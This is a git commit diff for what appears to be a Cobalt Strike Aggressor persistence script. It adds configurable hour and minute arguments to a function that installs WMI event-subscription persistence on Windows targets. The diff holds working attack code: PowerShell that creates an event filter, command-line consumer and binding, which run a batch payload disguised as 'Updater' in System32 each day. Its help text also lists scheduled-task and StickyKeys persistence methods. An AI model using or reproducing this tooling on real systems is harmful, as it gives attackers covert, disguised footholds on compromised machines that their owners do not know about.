Added arg6 and arg7 to addWMIDaily() for finer control on persistence
tophertimzen
parent
a5aa8163f8
commit
78ffe30626
|
|
@ -33,7 +33,7 @@ alias persistence {
|
||||||
addWMIOnStart($1,$2,$3,$4,$5,$6);
|
addWMIOnStart($1,$2,$3,$4,$5,$6);
|
||||||
}
|
}
|
||||||
else if ($4 eq "Daily"){
|
else if ($4 eq "Daily"){
|
||||||
addWMIDaily($1,$2,$3,$4,$5,$6);
|
addWMIDaily($1,$2,$3,$4,$5,$6,$7);
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
berror($1, "Specifiy OnStart or Daily.");
|
berror($1, "Specifiy OnStart or Daily.");
|
||||||
|
|
@ -441,10 +441,20 @@ sub addWMIDaily {
|
||||||
$payloadName = "Updater";
|
$payloadName = "Updater";
|
||||||
$taskName = "Updater";
|
$taskName = "Updater";
|
||||||
}
|
}
|
||||||
|
if ($6) {
|
||||||
|
if($7) {
|
||||||
|
$taskHour = $6;
|
||||||
|
$taskMinute = $7;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$taskHour = 13;
|
||||||
|
$taskMinute = 00;
|
||||||
|
}
|
||||||
|
|
||||||
$payloadPath = "C:\\Windows\\System32\\" . $payloadName . ".bat";
|
$payloadPath = "C:\\Windows\\System32\\" . $payloadName . ".bat";
|
||||||
|
|
||||||
$powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='" . $taskName ."';EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 13 AND TargetInstance.Minute = 00 GROUP WITHIN 60\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name='" . $taskName . "';ExecutablePath='" . $payloadPath ."';CommandLineTemplate ='" . $payloadPath . "'};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
|
$powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='" . $taskName ."';EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour ='" . $taskHour ."' AND TargetInstance.Minute ='" . $taskMinute . "' GROUP WITHIN 60\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name='" . $taskName . "';ExecutablePath='" . $payloadPath ."';CommandLineTemplate ='" . $payloadPath . "'};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
|
||||||
|
|
||||||
bpowershell($1,$powershellcmd);
|
bpowershell($1,$powershellcmd);
|
||||||
uploadPSpayload($1,$payloadPath);
|
uploadPSpayload($1,$payloadPath);
|
||||||
|
|
@ -573,7 +583,7 @@ Available methods:
|
||||||
*SchTasks OnStart <payload / task name>
|
*SchTasks OnStart <payload / task name>
|
||||||
*SchTasks OnLogon <payload / task name>
|
*SchTasks OnLogon <payload / task name>
|
||||||
*WMI OnStart <payload / task name>
|
*WMI OnStart <payload / task name>
|
||||||
*WMI Daily <payload / task name>
|
*WMI Daily <payload / task name> <Hour> <Minute>
|
||||||
**linkinfo
|
**linkinfo
|
||||||
*StickyKeys <payload / key name>
|
*StickyKeys <payload / key name>
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue